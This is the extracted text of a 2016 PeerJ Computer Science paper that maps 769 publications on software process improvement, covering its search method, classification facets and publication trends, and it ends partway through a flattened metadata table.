4.0 OPEN ACCESS Software process improvement: a systematic mapping study on the state of the art Marco Kuhrmann1, Philipp Diebold2 and Jürgen Münch3,4 1 Maersk Mc-Kinney Moller Institute—Software Engineering, University of Southern Denmark, Odense, Denmark 2 Process Engineering, Fraunhofer Institute for Experimental Software Engineering, Kaiserslautern, Germany 3 Herman Hollerith Center, Böblingen & Reutlingen University, Böblingen, Germany 4 Department of Computer Science, University of Helsinki, Helsinki, Finnland ABSTRACT Software process improvement (SPI) has been around for decades: frameworks are proposed, success factors are studied, and experiences have been reported. However, the sheer mass of concepts, approaches, and standards published over the years overwhelms practitioners as well as researchers. What is out there? Are there new trends and emerging approaches? What are open issues? Still, we struggle to answer these questions about the current state of SPI and related research. In this article, we present results from an updated systematic mapping study to shed light on the field of SPI, to develop a big picture of the state of the art, and to draw conclusions for future research directions. An analysis of 769 publications draws a big picture of SPI-related research of the past quarter-century. Our study shows a high number of solution proposals, experience reports, and secondary studies, but only few theories and models on SPI in general. In particular, standard SPI models like CMMI and ISO/IEC 15,504 are analyzed, enhanced, and evaluated for applicability in practice, but these standards are also critically discussed, e.g., from the perspective of SPI in small-to-medium-sized companies, which leads to new specialized frameworks. New and specialized frameworks account for the majority of the contributions found (approx. 38%). Furthermore, we find a growing interest in success factors (approx. 16%) to aid companies in conducting SPI and in adapting agile principles and practices for SPI (approx. 10%). Beyond these specific topics, the study results also show an increasing interest into secondary studies with the purpose of aggregating and structuring SPI-related knowledge. Finally, the present study helps directing future research by identifying under-researched topics awaiting further investigation. Subjects Software Engineering Keywords SPI, Software process, Systematic mapping study, Software process improvement INTRODUCTION Software process improvement (SPI; according to Humphrey, 1989) aims to improve software processes and comprises a variety of tasks, such as scoping, assessment, design and realization, and continuous improvement, e.g., Münch et al. (2012). In this field, a number of SPI models competes for the companies’ favor, success factors to support How to cite this article Kuhrmann et al. (2016), Software process improvement: a systematic mapping study on the state of the art. PeerJ Comput. Sci. 2:e62; DOI 10.7717/peerj-cs.62 https://peerj.com mailto:kuhrmann@mmmi.sdu.dk https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.62 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://dx.doi.org/10.7717/peerj-cs.62 SPI implementation at the large scale and the small scale are studied, and a multitude of publications report on experiences in academia and practice. Horvat, Rozman & Györkös (2000) consider SPI an important topic (regardless of the company size), as many companies put emphasis on the software process and its adaptation to the company context (Diebold et al., 2015; Vijayasarathy & Butler, 2015; Theocharis et al., 2015) to address different improvement goals, such accelerating software development or improving software quality. However, SPI is a diverse field: on the one hand, a number of standards is available, e.g., the Capability Maturity Model Integration (CMMI) or ISO/IEC 15504. On the other hand, these standards are criticized oftentimes, as for instance by Brodman & Johnson (1994), Staples et al. (2007) and Coleman & O’Connor (2008). Dictating processes and/or process improvement programs can lead to serious organizational ‘‘immune reactions’’ (Baddoo & Hall, 2003), e.g., of developers (Umarji & Seaman, 2008) and entire companies due to lacking resources (Hall, Rainer & Baddoo, 2002). In response, several tailored standard SPI models or custom SPI approaches are proposed, inter alia, to better address needs of small and very small companies, e.g., Raninen et al. (2012), Rozman et al. (1997) and Pino et al. (2009), or to adapt agile principles in the improvement process (Salo & Abrahamsson, 2007). Moreover, since SPI is mainly a human endeavor, much research was spent to study human factors, e.g., Stelzer & Mellis (1998), Allison (2010), Viana et al. (2012) and Laporte & O’Connor (2014). Those factors, furthermore, play an important role when SPI is conducted at the global scale, as for instance described by Paulish & Carleton (1994), or if large companies want to deploy agile processes as for instance presented by Hannay & Benestad (2010) or Korhonen (2013). Beyond, we find numerous experience reports, guidelines, and tools—all together providing a huge body of knowledge on SPI. However, despite this comprehensive body of knowledge, from the authors’ perspective, we lack a big picture of SPI and we still struggle to answer questions like: What is out there? What are open issues? Are there new trends and emerging approaches, and if yes, what are the new trends? What is the current state of SPI and related research after all? Problem statement & objective. The field of SPI evolved for decades and provides a vast amount of publications addressing a huge variety of topics. Still, we see new method proposals, research on success factors, and plenty of experience reports. Yet, missing is a big picture that illustrates where SPI gained a certain level of saturation, what are the hot topics, and what are unresolved issues calling for more investigation? To better understand the state of the art in SPI, we aim to analyze the whole publication flora to draw a big picture on SPI. Our overall goal is not to judge particular SPI research directions, but to provide the focus points of the past and to illustrate emerging/unresolved areas to show the directions for future research in this field. Contribution. In this article, we present findings from an updated comprehensive systematic mapping study. Starting with a curiosity-driven study, in two stages, we conducted a broadband search in six literature databases and one meta-search engine to harvest SPI-related publications from the past 26 years, and we incrementally analyzed the resulting 769 publications for publication frequency, research type facet, contribution type facet, and we categorized the found publications using a set of 40 metadata attributes. Kuhrmann et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.62 2/38 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.62 We draw a big picture showing that the majority of the publications on SPI either proposes custom/new approaches (i.e., models or frameworks) or is of philosophical nature (i.e., collecting, structuring, and analyzing knowledge). Our results show a constant publication of new approaches while evaluation of these proposals is scarcely available. Our data shows rare evidence and, notably, missing long-term and independently conducted replication studies. However, the data also reveals some (still) emerging topics, e.g., SPI for very small and medium-sized companies, and SPI in the context of lean and agile methods. Context & previously published material. The present study is a substantial update of our initial study published in Kuhrmann et al. (2015). In the course of updating the study, in particular, we added the following procedures/content: to provide an instrument that allows for continuously updating the study, we defined a new data collection procedure (Appendix ‘Data collection in the study update’), which we implemented to carry out the update presented here. The update adds 141 new papers to the result set, which now contains 769 papes in total. Furthermore, we modified the data classification approach. To achieve higher precision, we defined 40 metadata attributes, and we applied these attributes to the dataset while excluding the focus type facet from the analysis (cf. ‘Threats to validity’). Finally, while our initial study aimed to identify major trends, in this article, we provide a more detailed analysis of the trends found using the new classification. Outline. The remainder of this article is organized as follows: ‘Related Work’ summarizes and discusses related work. In ‘Research Design,’ we detail the study’s overall research design. Since this article presents an updated systematic mapping study, the article’s appendix details the original and updated research methods as well as required reference data. We present and discuss the study results in ‘Study Results and Discussion’, and conclude the article in ‘Conclusion & Future Work.’ RELATED WORK Literature on Software Process Improvement is rich and addresses a variety of topics. Yet, available secondary studies mainly focus on investigating success factors, e.g., Monteiro & De Oliveira (2011), Bayona-Oré et al. (2014) and Dybå (2000). Some studies provide insights into selected SPI topics, as for instance: Helgesson, Höst & Weyns (2012) review maturity models, and Hull et al. (2002) and El-Emam & Goldenson (2000) review different assessment models. Pino, García & Piattini (2008) contribute a review on SPI in the context of small and very small companies, and Staples & Niazi (2008) study motivating factors to adopt CMMI for improvement programs, while Müller, Mathiassen & Balshøj (2010) study SPI in general from the perspective of organizational change. All these representatively selected studies address specific topics, yet they do not contribute to a more general perspective on SPI. Such general studies are scarcely to find. For instance, Rainer & Hall (2001) analyze some ‘core’ studies on SPI for the purpose to work out addressed topics and gaps in the domain. However, they select few studies of which they assume to be good representatives thus providing a limited picture only. In terms of analyzing the entire domain and providing new (generalizable) knowledge, Unterkalmsteiner et al. (2012) contribute a systematic review on the state of the art of evaluation and measurement in Kuhrmann et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.62 3/38 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.62 SPI. They conduct a systematic review for the purpose of synthesizing a list of evaluation and measurement approaches, which they also analyze for the practical application. The study at hand does not aim at generating generalizable knowledge for one or more SPI-related topics in the first place. The purpose of the present study is to draw a big picture of the current state of the art of SPI in general. That is, as there is no comparable study available, this article closes a gap in literature by providing a comprehensive picture of the development of the field of SPI over time and by summarizing the current state of the art. Other than, e.g., Rainer & Hall (2001) or Unterkalmsteiner et al. (2012), we use the mapping study instrument according to Petersen et al. (2008) as research method and to present our results. Therefore, our study does not address one specific aspect/topic, but aims to draw a general picture from a ‘‘bird’s-eye perspective’’ to pave the way for further topic-specific and more detailed studies. RESEARCH DESIGN In this section, we present the overall study design. After describing the selected research method, we introduce the research questions, and describe the different instruments used for data collection and analysis, and the validity procedures. Research method In this study, we ground the overall research approach in the procedures implemented for our previously published initial study. In Kuhrmann et al. (2015), we followed an approach in which we applied different methods from systematic literature reviews (SLR) according to Kitchenham & Charters (2007) and systematic mapping studies (SMS) as presented by Petersen et al. (2008). While carrying out the study update, we used and improved the methods applied, which was necessary to develop a strategy that allows for continuous study updates. Figure 1 shows the overall research approach for which we provide details in subsequent sections. Initial study. The initial study was designed as a breadth-first search to cover the SPI domain as complete as possible. In February 2013, we performed the study preparation, conducted a series of test runs, and refined the search queries iteratively. End of April 2013, we conducted the main search, which resulted in about 85,000 hits. As we expected this large number of results and in order to support the dataset cleaning, we defined filter questions, which we applied to the initial result set. When the initial result set was cleaned, we performed a voting procedure to select the relevant publications from the result set. Based on this selection, we developed the classification schemas (by manual sampling as well as tool-supported) and harmonized the dataset (e.g., completion of keyword lists). Study update procedure. As one of the goals was to develop an instrument to provide a ‘‘heartbeat’’ of the whole field, having a strategy available to continuously update and refine the study was an imperative. Therefore, after having conducted and analyzed the initial study, we collected lessons learned and developed the update strategy. The outcome is shown in the right part of Fig. 1. The revised approach comprises a changed data collection procedure (Appendix ‘Data collection in the study update’) and an improved study Kuhrmann et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.62 4/38 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.62 Query&Development Data&Source&Selection T es t&R un &a nd & R ef in em en t Data&Collection Publication& Selection Research&Questions Data&Set& Cleaning Publication& Classification Filter&Query& Application Develop&+&Apply& Classification Data&Set& Harmonization Query&Update Initial&Metadata& Selection T es t&R un &a nd & R ef in em en t Data&Source&Selection In iti al &R es ul t&S et & A na ly si s Data&Collection Data&Cleaning&+& Harmonization Publication& Selection Publication& Classification Update&Metadata Figure 1 Overview of the applied research methods in the initial study (left part of the figure) as well as in the study update procedure (right part of the figure). classification procedure (‘Analysis and classification’). The update procedure was defined in August 2015, and the actual update was performed from September 2015 to November 2015. In subsequent sections, we describe this new strategy, whereas the particular changes are documented in detail in the appendix of this article. Research questions Our objective is to capture the domain of Software Process Improvement (SPI), to provide a continuously updated snapshot of the available publication pool, and to investigate research trends. Therefore, we define the following research questions: RQ 1: What is the general publication population on SPI? This research question aims to get an overview of the general publication pool on SPI. We are interested in getting information regarding publication count, frequency and, eventually, an overview of the different research type facets addressed by the found publications. RQ 2: What is the contribution population? Based on the found publications, we are interested in the addressed topics and major contributions (e.g., SPI models, theories, secondary studies, and lessons learned) to work out the SPI topics to which research contributed so far. RQ 3: What trends in SPI and SPI-related research can be observed? The third research question aims at investigating the focus points addressed by SPI research so far, and to work out gaps as well as trends. This research question shall pave the way to direct future research on SPI. Data collection procedures As mentioned in ‘Research method’, due to lessons learned in the initial study and in order to provide a feasible strategy for study updates, the research approach had to be improved. Kuhrmann et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.62 5/38 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.62 1Scopus is available from: http://www. scopus.com. Before we made this decision, we tested Scopus: We took some initial search queries (Table 10), queried Scopus, and compared the obtained data with the original datasets. We then iteratively enhanced the Scopus search strings and, eventually, defined the following quality requirement for the search: Given the trends in publication frequency and classification obtained in the initial study, we expect a similar frequency and classification for the Scopes-based search (see also ‘Result overview’). Table 1 Spreadsheet layout to collect, structure, and evaluate data. Information set Attributes and description Study Keys Running No (unique number in the dataset), No (unique number in the database), Database Content Title, Authors, Year, Keywords/Tags, Abstract Voting Relevance (defined during further analysis and voting by the differ- ent authors, cf. ‘Analysis preparation’), Disc (decision field to be set in workshops if a paper was marked for discussion), Result (paper is in or out) Publication Vehicle A publication is published in either a journal, magazine, conference, workshop, book, or miscellaneous (cf. Fig. 2) Research Type Facet Classification of a paper according to the research type facet (RTF) as proposed by Wieringa et al. (2005) Contribution Type Facet Classification of a paper according to the contribution type facet (CTF) according to Shaw (2003) (see also Petersen et al., 2008) Metadata Collection of metadata per paper according to the structure from Fig. 2 Further Information Further information and/or further metadata to be collected The most significant changes regarding the data collection procedure are described in Appendix ‘Data Collection Procedures.’ In the following, we describe the actual data collection procedure applied to the present study. Query construction. The basic queries were already developed in the initial study (Appendix ‘Query construction’). After the initial result set analysis, the query strings were critically reviewed and updated (Fig. 1). However, no new search terms were added, only the structure of the queries required some updates to address the new data source that serves as main input. In a nutshell, due to the change of the search engine, the main search strings S1–S8 were integrated with the context and filter queries, which were required in the initial study to help querying the different literature databases. The full new search queries can be depicted from Table 11 (Appendix ‘Search queries’). Data sources and data format. In the present study, after reviewing the initial study designs and results, we looked for more efficient ways to fetch papers for the update and eventually opted for Scopus1 as new search engine. Having executed the different queries, obtained data was merged into one spreadsheet that structures the data and contains the attributes shown in Table 1. The data structure shown in Table 1 follows the structure used in the initial study. Analysis procedures We describe the analysis preparation as well as the steps conducted to answer the research questions. Analysis preparation We performed an automated search that required us to filter and prepare the result set. The data analysis is prepared by harmonizing the data, performing a 2-staged voting process, and integrating the initial and the update data set to prepare the result set analysis. Kuhrmann et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.62 6/38 http://www.scopus.com http://www.scopus.com https://peerj.com http://dx.doi.org/10.7717/peerj-cs.62 Publication+Vehicle Dimension:+Process Publication+ Objective Assessment+and+ Assessment+Models (Quasi<)Standards Dimension:+ Study+Type/Method Dimension:+Context Life+Cycle+Phases Company+Size+and+Scale Application+Domain Journal Magazine Conference Workshop Book Miscellaneous Agile/Lean Process:Simulation Process:Pattern/Line Product:Management Success:Factors Custom:Model General:improvement CMMI ISO/IEC:15504 General:Measurement Six:Sigma Bootstrap CompetiSoft Cont.:Improvement PSP/TSP ISO/IEC:29110 ISO/IEC:12207 Survey/Interview SingleQCase:Study MultiQCase/Long.:Study Replication:Study SLR/SMS Grounded:Theory Project:Management Quality:Management Requirements:Eng. Architecture Implementation Test VSE/SME Other:Company:Size GSE Embedded:Systems Telecommunications Medical:Devices Automotive MissionQcritical: Defense Business:IS Web/Mobile/Cloud Skills:and:Education XOR Figure 2 Overview of the collected metadata in the study analysis phase, including publication vehicles and 40 study-specific attributes and their grouping in topic cluster (dimensions). Kuhrmann et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.62 7/38 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.62 Table 2 Inclusion and exclusion criteria applied to the study. Criteria Description IC1 Title, keyword list, and abstract make explicit that the paper is related to SPI. IC2 Paper presents SPI-related topics, e.g., SPI models, assessments, experiences in adopting and deploying software processes, and reports on improving specific methods/practices. EC1 Paper is not in English. EC2 Paper is not in the field of software engineering or computer science in general. EC3 Paper is a tutorial or workshop summary only. EC4 Paper occurred multiple times. EC5 Paper full text is not available for download. Harmonization. To make the selection of the contributions more efficient, we first integrated and cleaned the result set. We removed the duplicates, which we identified by title, year, and author list. The main instrument used was the Microsoft Excel feature to identify and remove duplicates (cf. Appendix ‘Search and cleaning procedure’). This procedure was performed on the integrated result set. Voting. We applied the voting procedures as described in Kuhrmann et al. (2015). That is, we performed a multi-staged voting process to classify the papers as relevant or irrelevant and to build a set of publications for further investigation (Table 1, Voting). In the voting process, the inclusion and exclusion criteria listed in Table 2 guided the decision-making process. Two researchers performed individual votings (initially: publication title and abstract). If both agreed, the paper was directly included or excluded. For those papers that were not immediately agreed, workshops were performed to resolve disagreements. After the initial voting, the selection was reviewed by a third researcher for confirmation. Integration. In the final step, we integrated the initial result set from Kuhrmann et al. (2015) with the Scopus update. Due to the expected overlaps (search year 2013), we checked the result set for duplicates again and—if necessary—removed the found duplicates. Analysis and classification On the final set, the analysis and classification were performed using the abstracts and—where necessary—the complete publication. Generally, each classification step was conducted independently by two researchers, merged, discussed, and eventually checked by the third researcher. In the following, we summarize the analysis procedures used to answer our research questions. Research type facets. In order to classify the publications, we rely on the classification according to the research type facet as proposed by Wieringa et al. (2005). However, during a test classification on a small sample, we found the need to adjust the facet definitions. Table 3 lists the research type facets as applied to the result set. Contribution type facets. In order to analyze what and how publications contribute to the body of knowledge, we adopted the contribution type facets as proposed by Shaw (2003). Table 4 lists the facet types applied to the result set. Kuhrmann et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.62 8/38 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.62 2In the initial study Kuhrmann et al. (2015), the focus type facets were found inadequate for this study stage, e.g., due to variety of the topics addressed and the limitations to define proper topic clusters or the need to have multiple assignments for many papers. Table 3 Applied research type facets as proposed by Wieringa et al. (2005). Criteria Description Evaluation research Implemented in practice, evaluation of implementation conducted; requires more than just one demonstrating case study Solution proposal Solution for a problem is proposed, benefits/application is demonstrated by example, experiments, or student labs; also includes proposals complemented by one demonstrating case study for which no long-term evaluation/dissemination plan is obvious Philosophical paper New way of thinking, structuring a field in form of a taxonomy or a framework, secondary studies like SLR or SMS Opinion paper Personal opinion, not grounded in related work and research methodology Experience paper Personal experience, how are things done in practice Table 4 Applied contribution type facets as proposed by Shaw (2003). Criteria Description Model Representation of observed reality by concepts after conceptualization Theory Construct of cause–effect relationships Framework Frameworks/methods related to SPI Guideline List of advices Lessons learned Set of outcomes from obtained results Advice Recommendation (from opinion) Tool A tool to support SPI Metadata. Instead of applying the focus type facet2 to the result set, we opted for the collection of metadata. The metadata attributes of interest were initially collected and structured in a workshop in which the lessons learned from the initial study were taken into account. During the metadata collection, reviewers had the option to propose and add further attributes, i.e., the list of metadata was extended and then the result set was revisited (see also Fig. 1). Figure 2 provides a structured overview of the metadata. In particular, we collected metadata in the following four categories: Publication Vehicle, Study Type and Method, Process, and Context. The Publication Vehicle is an XOR-selection, i.e., a paper is for instance either a conference paper or a journal article. The other three categories (dimensions) can comprise sub-categories and allow for multiple selection. For example, a paper can contain an SLR-based SPI model, which is confirmed using an expert interview (dimension: Study Type and Method), and the study can address an agile/lean custom model that adopts CMMI (dimension: Process) in an SME company that works in medical devices, and improves quality management and test (dimension: Context). Validity procedures To increase the validity of our study, we implemented the following procedures: We extensively reused our initial research design, which we only modified in terms of the Kuhrmann et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.62 9/38 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.62 Table 5 Data collection and filtering results of the study update, and total numbers of studies after merging and cleaning initial and update datasets. Automatic search Manual selection Integration Hits EC2 EC1,4 Voting Discussion Merge Final S1 532 333 270 56 50 S2 4,673 1,402 880 74 71 S3 815 301 15 1 1 S4 4,223 1,150 165 17 14 S5 1,609 545 29 1 1 S6 507 307 0 0 0 S7 5,997 1,659 89 6 4 S8 330 227 2 0 0 Total 18,686 5,924 1,450 155 141 776 769 data collection procedures. Furthermore, during the whole study, we performed several quality assurance activities (partially tool-supported), iterated through the single steps, and stepwise analyzed and refined tentative result sets. During the publication selection and classification, we relied on researcher triangulation, e.g., within a rigorous multi-staged voting procedure in which two researchers carried out the initial classification and the third researcher confirmed the classification. For the development of the classification schemas, we either ground the developed schemas in external proposals or rely on flexible and extensible metadata. Finally, we continuously compared tentative results with findings from our initial study to check for general trends. STUDY RESULTS AND DISCUSSION In this section, we present and discuss the results of our study. In ‘Result overview’, we provide an overview of the whole result set and discuss the development of the domain observed in the study update. ‘RQ 1: general publication flora’, ‘RQ 2: result set contribution,’ ‘RQ 3: Trends in SPI-related Research,’ answer the research questions, before we discuss our findings in ‘Discussion’. Finally, we discuss threats to validity of this study in ‘Threats to validity.’ Result overview In this section, we provide an overview of the whole result set. Since the present study is an update study, the starting point for the study at hand is the result set from Kuhrmann et al. (2015). An overview of this initial result set can be taken from Table 9. The study update covers 1.5 years and comprises publications from January 2013 to July 2015. The outcomes of the search, cleaning, and merge procedures are shown in Table 5. The table shows seven papers removed in the merge procedures, which are multiple occurrences in 2013 (eight papers were found in the initial study, which were integrated with the update result set). Figure 3 visualizes the publication frequency of the integrated result set by showing the number of publications over time including two trend lines (trend calculation basis: Kuhrmann et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.62 10/38 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.62 Figure 3 Overall publication frequency (papers on SPI published per year). mean, 3-year and 10-year period). In 1996, the numbers show a growing interest in SPI. From this point on, SPI became an inherent part of software engineering research. Figure 3 shows periodical waves over the years starting three to five years, which is emphasized by the first 3-year trend line. Within these waves the largest gap/decrease is between 2002 and 2003. Another big jump can be seen in 2013, where the number of papers increased by approximately 50%. Furthermore, Fig. 3 shows SPI still being a field of interest, as the second 10-year trend line shows. The majority of the papers in the result set are journal articles (n=353, 45.9%) and conference papers (n=350, 45.5%). Magazine articles (n=33) and workshop papers (n=30) count for 4.3% and 3.9%. The result set does not contain books, but three papers (0.4%) that are classified as miscellaneous (mostly book chapters). In summary, the updated study includes 769 papers on SPI published between 1989 and July 2015, which are subject to analysis. ‘RQ 1: general publication flora’, ‘RQ 2: result set contribution,’ ‘RQ 3: Trends in SPI-related Research’, we provide the detailed analysis to answer the research questions. Result set quality assurance. As mentioned in ‘Data collection procedures,’ we changed the data collection procedure and, thus, we defined the quality requirement that the update result set should ‘‘harmonize’’ with the initial result set, i.e., the update set should show similar trends and distribution. This quality assurance was carried out using the aforementioned trend analysis and using the different research- and contribution type facets (cf. ‘RQ 1: general publication flora’). Figure 4 shows the average (absolute) paper numbers and the relative distribution per category. The figure visualizes these numbers for three data points: the average in the merged dataset, and the average of the data from 1989–2012 and the study update (2013–2015), respectively. Given the trend (Fig. 3) and the about 50% increase of publications per year, still, the relative distribution of the papers in the update result set follows the general trend of the result set, which could just be observed in our initial study. Kuhrmann et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.62 11/38 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.62 Figure 4 Overview of the (average) paper numbers and percentage in the result sets. Both parts show a similar distribution in the different cate- gories in the entire result set and the subsets addressed by the initial study and the study update. RQ 1: general publication flora To get an overview of the harvested papers, we performed a categorization to define the research type facets and contribution type facets (Tables 3 and 4). To analyze the respective trends, Fig. 5 provides an integrated picture that shows the papers in the different categories and over time. Regarding the research type facet, Fig. 5 shows a clear trend towards solution proposals (n=294, 38.2%) and philosophical papers (n=264, 34.3%). From the 769 papers in the result set, 114 papers (14.8%) are classified as evaluation papers and 91 papers (11.8%) are classified as experience papers. Only six out of 769 papers (0.8%) are opinion papers. Taking into account the general trend of the result set (Fig. 4), the classification according to the research type facet indicates a still evolving research field. Figure 5 illustrates, in average, approx. 75% of the published papers per year are either proposing ‘‘something new’’ or discussing an SPI-related topic from new/different perspectives, e.g., using secondary studies such as systematic reviews or mapping studies (n=43, 5.6%). At the same time, only about a quarter of the published papers per year deals with evaluating research or reporting experiences. Figure 5 (lower part) shows a similar tendency for the contribution type facet. From the 769 papers in the result set, 358 papers (46.6%) contribute lessons learned, followed by 280 papers (36.4%) that contribute custom or new frameworks. All remaining categories are below 5%, in particular, models (n=30, 3.9%), theories (n=13, 1.7%), guidelines (n=36, 4.7%), advice (n=15, 2.0%), and tools (n=37, 4.8%). That is, approx. 83% of all papers either propose frameworks or discuss lessons learned, which is, again, consistent with the overall trend over time. An impression about the progress in the field can be depicted from Fig. 6 in which we create a first systematic map relating the research- and the contribution type facet. The figure shows that most of the frameworks have to be considered a solution proposal Kuhrmann et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.62 12/38 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.62 Figure 5 Number of papers per year and relative distribution over research type facet (A) and contribution type facet (B). (204 out of 280), but only 48 papers from the category framework are classified as evaluation research. Similar, about two third of all papers classified as lessons learned (195 out of 358) are classified as philosophical paper, i.e., lessons learned are drawn from discussion/observation in artificial or lab environments or concluded from secondary studies. From the 358 lessons-learned papers, 52 are classified as evaluation research and 81 as experience reports, which together makes approx. 37% of all lessons learned papers. Furthermore, 28 out of 30 papers that contribute models to the result set are classified as solution proposal (18 papers) or philosophical paper (10 papers). That is, models on SPI are either proposed awaiting their evaluation or those models are concluded from discussion or secondary studies, also awaiting evaluation. The same picture can be observed for theories: 11 out of 13 papers that are classified as contributing a theory are also classified as philosophical paper, and only two are classified as evaluation research. Summary. From the top-level analysis using the basic classification schemas, we can observe: in the result set, we see a clear trend towards proposing new solutions, and the majority of the proposed solutions considers SPI frameworks. A second major trend is reporting lessons learned. These trends can be observed in the final result set as well as over time. Regarding the proposed frameworks, approx. 73% (204 out of 280 framework-related papers) are classified as solution proposals, i.e., method- or framework proposals without Kuhrmann et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.62 13/38 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.62 Figure 6 Systematic map over research- and contribution type facets. any evaluation or with theoretical or lab-based evaluation only. Similar, approx. 63% of all reported lessons learned (195 out of 358) are classified as philosophical paper, i.e., conclusions are drawn from theoretical or lab-based evaluation only. In summary, the big picture presented in this section shows a still evolving research field, which is developing new approaches and collecting lessons learned, but this field still lacks evaluated models and theories. RQ 2: result set contribution In this section, we provide a more detailed perspective on the result set using the collected metadata as illustrated in Fig. 2. While classifying the result set, we collected metadata for the three dimensions Study Type and Method, Process (incl. sub-categories), and Context (incl. sub-categories). In addition to the publication vehicle, we defined 40 attributes, and each paper could be assigned none or many of these attributes (‘Analysis and classification’). In total, for the 769 studied papers, we assigned 2,408 attribute values. All metadata assignments are summarized in Fig. 7 and discussed in the following. Dimension: process. Within this dimension, we built the three categories Assessment and Assessment Models, (Quasi-)Standards, and Publication Objective, which provide the following insights: Within the topic of assessment and assessment models, we focused on common assessment (maturity) models. Most frequently mentioned is CMMI with 170 assigned papers, followed Kuhrmann et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.62 14/38 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.62 To ta l 19 89 19 90 19 91 19 92 19 93 19 94 19 95 19 96 19 97 19 98 19 99 20 00 20 01 20 02 20 03 20 04 20 05 20 06 20 07 20 08 20 09 20 10 20 11 20 12 20 13 20 14 20 15 Agile/Lean 73 0 0 0 0 0 0 1 1 0 1 0 1 0 1 0 6 1 0 2 4 1 7 6 4 21 14 2 Process6Simulation 23 0 0 0 0 0 0 1 0 1 0 4 2 2 4 0 0 0 1 1 1 1 0 2 0 0 3 0 Process6Line/Patterns 17 0 0 0 0 1 0 0 1 1 0 0 0 2 0 0 0 2 2 0 1 1 0 3 1 1 1 0 Product6Line/Management 9 0 0 0 0 0 0 0 0 0 0 0 1 0 2 0 0 0 1 0 1 0 0 1 1 0 2 0 Success6Factors 126 0 0 0 0 0 1 0 5 1 3 3 5 6 10 5 3 5 2 6 6 6 12 7 12 13 13 2 Custom6Model 295 1 0 2 1 2 2 3 6 13 5 11 10 15 20 4 9 14 13 16 14 19 24 19 15 29 20 8 General6Improvement 232 1 0 1 3 2 6 1 5 5 11 7 8 12 14 7 12 13 14 15 11 7 14 19 11 16 14 3 CMMI 170 0 1 0 1 1 1 0 9 10 6 8 6 6 11 8 9 6 7 6 9 14 14 6 8 12 9 2 ISO/IEC615504 94 0 0 0 0 1 0 1 7 8 5 7 4 5 6 2 3 5 2 5 3 5 3 1 5 12 4 0 General6Measurement 196 1 1 1 0 2 4 4 8 8 4 6 8 9 10 6 8 8 7 12 12 13 11 12 9 14 14 4 Six6Sigma 13 0 0 0 0 0 0 0 0 1 0 0 0 0 0 2 1 0 2 3 1 1 0 0 0 1 1 0 Bootstrap 17 0 0 0 0 0 1 0 4 3 3 5 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 CompetiSoft 4 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 2 1 Continuous6Improvement 14 0 0 0 1 0 0 1 1 0 0 0 1 1 1 0 0 0 1 1 1 1 2 2 0 0 0 0 PSP/TSP 17 0 0 0 0 0 0 0 0 1 1 1 2 0 2 1 0 1 1 2 2 0 2 1 0 0 0 0 ISO/IEC629110 6 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 1 3 1 ISO/IEC612207 7 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 1 0 0 2 3 0 0 Survey/Interview 95 1 0 1 0 0 0 0 5 2 1 4 4 4 8 4 0 8 4 5 5 4 6 6 5 9 7 2 Single6CaseNStudy 174 0 0 1 0 1 3 0 8 9 8 7 8 7 7 5 6 6 8 11 7 10 14 9 7 17 12 3 MultiNCase/Long.6Study 136 0 0 0 1 1 1 0 1 0 3 7 9 6 14 2 4 5 10 5 10 12 8 11 5 10 7 4 Replication6Study 3 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 2 0 SLR/SMS 55 0 0 0 0 0 0 1 1 0 3 1 2 1 0 1 1 1 0 1 2 1 3 7 5 6 13 5 Grounded6Theory 18 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 1 1 1 0 1 2 3 3 4 1 Project6Management 92 0 0 0 0 0 2 0 2 5 4 8 5 1 3 5 5 5 6 5 5 4 6 7 4 4 5 1 Quality6Management 71 0 0 1 0 1 0 1 0 3 3 2 4 3 3 4 4 4 1 7 2 4 1 7 3 5 5 3 Requirements6Engineering 41 0 0 1 0 0 1 0 3 1 1 2 0 0 2 3 3 5 5 2 2 3 0 0 3 3 0 1 Architecture 17 0 0 0 0 0 0 0 0 0 1 1 1 0 3 0 2 1 2 1 0 1 0 3 0 0 1 0 Implementation 8 0 0 0 0 0 0 0 0 0 0 2 0 0 1 0 0 0 1 2 0 0 0 1 0 1 0 0 Test 36 0 0 0 0 0 0 1 1 0 2 1 0 1 1 0 2 2 2 1 1 2 4 3 2 6 4 0 VSE/SME 116 0 0 0 0 0 1 0 1 2 3 5 2 7 8 2 7 4 4 6 5 8 15 7 6 7 12 4 Other6Company6Size 75 1 1 1 0 1 4 0 3 1 3 3 6 4 5 5 6 3 1 4 4 2 3 4 1 5 4 0 GSE 37 0 0 0 0 0 1 0 2 0 